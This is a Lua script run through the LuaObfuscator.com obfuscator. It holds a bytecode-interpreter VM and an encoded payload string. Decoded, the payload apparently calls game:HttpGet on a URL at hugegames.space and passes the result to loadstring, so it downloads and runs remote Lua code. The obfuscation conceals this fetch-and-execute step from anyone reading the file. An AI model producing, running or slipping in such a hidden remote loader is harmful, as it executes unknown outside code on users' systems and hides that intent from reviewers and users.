--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==2) then function v22() local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23() local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + (5 -3) ;return (v33 * (493 -237)) + v32 ;end v18=3;end if (v18==4) then function v25() local v34=v24();local v35=v24();local v36=2 -1 ;local v37=(v21(v35,1 + 0 ,639 -((1742 -(1069 + 118)) + (145 -81)) ) * ((933 -(857 + 74))^32)) + v34 ;local v38=v21(v35,589 -(367 + 201) ,958 -(214 + 713) );local v39=((v21(v35,58 -(56 -30) )==(351 -(87 + 263))) and  -(1 + 0)) or (1 + 0 + 0) ;if (v38==(0 -0)) then if (v37==((0 -0) + 0)) then return v39 * (877 -(282 + 595)) ;else v38=1638 -(1523 + 114) ;v36=0 + 0 ;end elseif (v38==(2918 -871)) then return ((v37==0) and (v39 * ((1 + 0)/(1065 -(68 + 997))))) or (v39 * NaN) ;end return v8(v39,v38-(2293 -(226 + 1036 + 8)) ) * (v36 + (v37/((8 -6)^(169 -(32 + 85))))) ;end v26=nil;function v26(v40) local v41=791 -(368 + 423) ;local v42;local v43;while true do if (v41==(3 -2)) then v42=v3(v16,v19,(v19 + v40) -(19 -((448 -(145 + 293)) + 8)) );v19=v19 + v40 ;v41=7 -5 ;end if (v41==(445 -(416 + 26))) then return v6(v43);end if (v41==2) then v43={};for v74=3 -(432 -(44 + 386)) , #v42 do v43[v74]=v2(v1(v3(v42,v74,v74)));end v41=3;end if (v41==(0 + 0)) then v42=nil;if  not v40 then v40=v24();if (v40==(0 -0)) then return "";end end v41=1487 -(998 + 488) ;end end end v18=5;end if (v18==6) then v29=nil;function v29() local v44=0;local v45;local v46;local v47;local v48;local v49;local v50;while true do local v66=0 -0 ;local v67;while true do if (v66==0) then v67=0 + 0 ;while true do if (v67~=(438 -(262 + 176))) then else if (v44==(1583 -(1535 + 46))) then local v99=1721 -(345 + 1376) ;while true do local v102=0 + 0 ;while true do if (v102==(0 + 0)) then if ((560 -(306 + 254))~=v99) then else for v108=689 -(198 + 490) ,v24() do local v109=0 + 0 ;local v110;local v111;local v112;while true do if (v109~=(0 -0)) then else v110=1467 -(899 + 568) ;v111=nil;v109=4 -3 ;end if (v109~=(2 -1)) then else v112=nil;while true do if (v110~=1) then else while true do if (v111~=(603 -(268 + 335))) then else v112=v22();if (v21(v112,1207 -(696 + 510) ,1)==(0 -0)) then local v161=0;local v162;local v163;local v164;local v165;while true do if (v161==(291 -(60 + 230))) then v164=nil;v165=nil;v161=1264 -(1091 + 171) ;end if (2~=v161) then else while true do if (v162==(0 + 0)) then local v167=0;local v168;while true do if (v167==(1456 -(282 + 1174))) then v168=0;while true do if (v168==(0 + 0)) then v163=v21(v112,813 -(569 + 242) ,8 -5 );v164=v21(v112,12 -8 ,19 -13 );v168=1252 -(721 + 530) ;end if (v168==(375 -(123 + 251))) then v162=2 -1 ;break;end end break;end end end if (v162~=(14 -11)) then else if (v21(v164,3,701 -(208 + 490) )==(1 + 0)) then v165[1 + 3 ]=v50[v165[4]];end v45[v108]=v165;break;end if (v162==2) then local v170=0;while true do if (v170==(1086 -(461 + 625))) then if (v21(v164,1,1289 -(993 + 295) )==(1 + 0)) then v165[1 + 1 ]=v50[v165[838 -(660 + 176) ]];end if (v21(v164,1 + 1 ,1173 -(418 + 753) )~=(1 + 0)) then else v165[1 + 2 ]=v50[v165[205 -(14 + 188) ]];end v170=1;end if (v170~=(676 -(534 + 141))) then else v162=2 + 1 ;break;end end end if (v162==(530 -(406 + 123))) then v165={v23(),v23(),nil,nil};if (v163==(0 -0)) then local v173=0 -0 ;while true do if (v173==(0 -0)) then v165[1325 -(1249 + 73) ]=v23();v165[2 + 2 ]=v23();break;end end elseif (v163==(1146 -(466 + 679))) then v165[6 -3 ]=v24();elseif (v163==2) then v165[3]=v24() -((5 -3)^(1916 -(106 + 1794))) ;elseif (v163~=3) then else local v182=0 + 0 ;local v183;local v184;while true do if (v182==(1 + 0)) then while true do if (v183==(0 -0)) then v184=0;while true do if (v184==(0 -0)) then v165[117 -(4 + 110) ]=v24() -((2 + 0)^(412 -(115 + 281))) ;v165[107 -(17 + 86) ]=v23();break;end end break;end end break;end if (v182==0) then v183=0;v184=nil;v182=2 -1 ;end end end v162=2;end end break;end if (v161==(0 + 0)) then v162=0 -0 ;v163=nil;v161=2 -1 ;end end end break;end end break;end if (v110~=(0 -0)) then else v111=867 -(550 + 317) ;v112=nil;v110=1 -0 ;end end break;end end end for v113=1,v24() do v46[v113-1 ]=v29();end v99=1;end if ((1 -0)~=v99) then else return v48;end break;end end end end if (v44==(0 -0)) then v45={};v46={};v47={};v48={v45,v46,nil,v47};v44=1;end v67=1;end if (v67~=1) then else if (v44~=(1 -0)) then else local v100=0;local v101;while true do if (v100==0) then v101=1990 -(582 + 1408) ;while true do if (v101==(6 -4)) then v44=2;break;end if (v101==(66 -(30 + 35))) then local v107=0;while true do if (v107==0) then for v146=1 -0 ,v49 do local v147=0 -0 ;local v148;local v149;local v150;local v151;while true do if (v147~=(1826 -(1195 + 629))) then else while true do if (v148~=(1 + 0)) then else v151=nil;while true do if (v149==(0 -0)) then v150=v22();v151=nil;v149=3 -2 ;end if (v149==(242 -(187 + 54))) then if (v150==(781 -(162 + 618))) then v151=v22()~=(0 + 0) ;elseif (v150==2) then v151=v25();elseif (v150~=(583 -(361 + 219))) then else v151=v26();end v50[v146]=v151;break;end end break;end if (0==v148) then local v160=0;while true do if (v160==(1 + 0)) then v148=1;break;end if (v160==(0 -0)) then v149=0;v150=nil;v160=1 -0 ;end end end end break;end if (v147~=(1 + 0)) then else v150=nil;v151=nil;v147=1638 -(1373 + 263) ;end if (v147~=(1000 -(451 + 549))) then else v148=0 + 0 ;v149=nil;v147=1 -0 ;end end end v48[4 -1 ]=v22();v107=1385 -(746 + 638) ;end if (v107==(3 -2)) then v101=2 + 0 ;break;end end end if (v101==(0 + 0)) then v49=v24();v50={};v101=1 + 0 ;end end break;end end end break;end end break;end end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v51) if (v1(v51,2)==79) then v20=v0(v3(v51,1,1));return "";else local v68=v2(v0(v51,16));if v20 then local v76=v5(v68,v20);v20=nil;return v76;else return v68;end end end);v18=1;end if (v18==3) then v24=nil;function v24() local v52,v53,v54,v55=v1(v16,v19,v19 + (129 -(116 + 10)) );v19=v19 + (854 -(20 + 830)) ;return (v55 * (16777954 -(542 + 100 + 96))) + (v54 * (51157 + 14379)) + (v53 * (27 + 48 + (476 -295))) + v52 ;end v25=nil;v18=4;end if (v18==7) then function v30(v56,v57,v58) local v59=0;local v60;local v61;local v62;while true do if (v59==0) then v60=v56[1];v61=v56[2];v59=1;end if (v59==1) then v62=v56[3];return function(...) local v77=v60;local v78=v61;local v79=v62;local v80=v28;local v81=1;local v82= -1;local v83={};local v84={...};local v85=v12("#",...) -1 ;local v86={};local v87={};for v91=0,v85 do if (v91>=v79) then v83[v91-v79 ]=v84[v91 + 1 ];else v87[v91]=v84[v91 + 1 ];end end local v88=(v85-v79) + 1 ;local v89;local v90;while true do local v92=0;while true do if (1==v92) then if (v90<=6) then if (v90<=2) then if (v90<=0) then v87[v89[2]]=v89[3];elseif (v90>1) then local v115=0;local v116;while true do if (v115==0) then v116=v89[2];v87[v116]=v87[v116](v13(v87,v116 + 1 ,v82));break;end end else v87[v89[2]]();end elseif (v90<=4) then if (v90>3) then local v117=v89[2];local v118,v119=v80(v87[v117](v13(v87,v117 + 1 ,v89[3])));v82=(v119 + v117) -1 ;local v120=0;for v142=v117,v82 do v120=v120 + 1 ;v87[v142]=v118[v120];end else local v121=v89[2];local v122=v87[v89[3]];v87[v121 + 1 ]=v122;v87[v121]=v122[v89[4]];end elseif (v90>5) then do return;end else local v126=0;local v127;local v128;local v129;local v130;while true do if (v126==0) then v127=v89[2];v128,v129=v80(v87[v127](v13(v87,v127 + 1 ,v89[3])));v126=1;end if (v126==1) then v82=(v129 + v127) -1 ;v130=0;v126=2;end if (v126==2) then for v157=v127,v82 do v130=v130 + 1 ;v87[v157]=v128[v130];end break;end end end elseif (v90<=9) then if (v90<=7) then v87[v89[2]]=v58[v89[3]];elseif (v90>8) then local v131=0;local v132;while true do if (v131==0) then v132=v89[2];v87[v132]=v87[v132](v13(v87,v132 + 1 ,v82));break;end end else local v133=v89[2];local v134=v87[v89[3]];v87[v133 + 1 ]=v134;v87[v133]=v134[v89[4]];end elseif (v90<=11) then if (v90==10) then v87[v89[2]]=v89[3];else v87[v89[2]]();end elseif (v90>12) then do return;end else v87[v89[2]]=v58[v89[3]];end v81=v81 + 1 ;break;end if (v92==0) then v89=v77[v81];v90=v89[1];v92=1;end end end end;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v63,v64,v65) if v65 then local v69=(v63/((4 -2)^(v64-(2 -1))))%((1 + 1)^(((v65-(978 -(553 + (1181 -757)))) -(v64-(1552 -(1126 + 425)))) + ((908 -502) -(118 + 287)))) ;return v69-(v69%((1 + 2) -2)) ;else local v70=(1123 -(118 + 1003))^(v64-(2 -1)) ;return (((v63%(v70 + v70))>=v70) and (378 -(142 + 235))) or ((0 -0) + 0) ;end end v22=nil;v18=2;end end end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403343O00682O7470733A2O2F6875676567616D65732E73706163652F623465376562363763323138302O3732333635332O3033312E6C756100083O0012073O00013O001207000100023O00200800010001000300120A000300044O0005000100034O00095O00022O00013O000100012O000D3O00017O00",v9(),...);
